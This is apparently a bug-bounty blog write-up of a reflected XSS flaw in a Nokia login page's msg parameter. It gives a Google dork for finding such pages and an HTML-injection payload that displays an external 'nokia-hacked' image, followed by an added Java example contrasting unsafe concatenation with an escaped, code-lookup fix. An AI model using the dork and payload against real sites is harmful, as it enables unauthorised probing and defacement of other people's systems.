Hello, hackers. Welcome to my other write-up, Nokia Hacked with RXSS Vulnerability…

This time Nokia is my target…

I started from Google Dorks…

site:*nokia.com inurl:/login.jsp?msg=

And I discovered this URL.

As you can see, the msg parameter says ‘Session Timed out. Please Login Again’.

LOOK INTO STEPS:

1. I simply entered a script tag into the message parameter, like this: <script></script>
See what happened.

2. I entered this payload into the message parameter:

<IMG%20SRC="https://d15shllkswkct0.cloudfront.net/wp-content/blogs.dir/1/files/2011/08/nokia-hacked.png"><h1>Too%20Weak%20Security</h1>

Impact of Reflected XSS:

Attackers use phishing emails, malicious links, and other techniques to trick victims into making a request to the server. The malicious data in that request is reflected back in the server's response and then executed in the victim’s browser.
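
How a login page like the one above can render its msg parameter without reflecting markup, shown as an added example that is not code from Nokia or from this write-up. The class name, method names, message codes and the second message text are assumptions made for illustration.

```java
import java.util.Map;

// Added illustration: names and the message-code table are hypothetical.
public class LoginMessage {

    // Fixed, server-owned texts; the URL carries only a short code.
    private static final Map<String, String> MESSAGES = Map.of(
        "timeout", "Session Timed out. Please Login Again",
        "logout", "You have been logged out."); // constructed sample text

    // Vulnerable pattern: the parameter is concatenated into HTML as-is,
    // so any markup in it becomes part of the page.
    static String renderUnsafe(String msg) {
        return "<div class=\"notice\">" + msg + "</div>";
    }

    // Encode the five HTML-significant characters (element and quoted-attribute context).
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    // Hardened: look the code up in the table; unknown values render nothing.
    // The text is still encoded on output as defence in depth.
    static String renderSafe(String code) {
        String text = (code == null) ? null : MESSAGES.get(code);
        return text == null ? "" : "<div class=\"notice\">" + escapeHtml(text) + "</div>";
    }

    public static void main(String[] args) {
        String probe = "<h1>injected</h1>"; // constructed sample input
        System.out.println(renderUnsafe(probe));             // markup reaches the page
        System.out.println(renderUnsafe(escapeHtml(probe))); // encoded, displayed as text
        System.out.println(renderSafe(probe));               // not a known code
        System.out.println(renderSafe("timeout"));           // known code
    }
}
```

With this design the login URL would carry a code such as msg=timeout instead of the sentence itself, so there is no free text left to reflect.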

Youtube Video: https://youtu.be/e9kpmCajTzA

Thanks for taking the time to read my write-up. Share it with your friends, and like & follow for more updates.

Amit Kumar Biswas @Amitlt2

SECURITY ANALYST | SECURITY RESEARCHER | ACK. BY APPLE, MICROSOFT, SAMSUNG, SOUNDCLOUD, ACCENTURE, TAKEAWAY & MANY MORE | R&D IN BLOCKCHAIN TECH | B.TECH IN CSE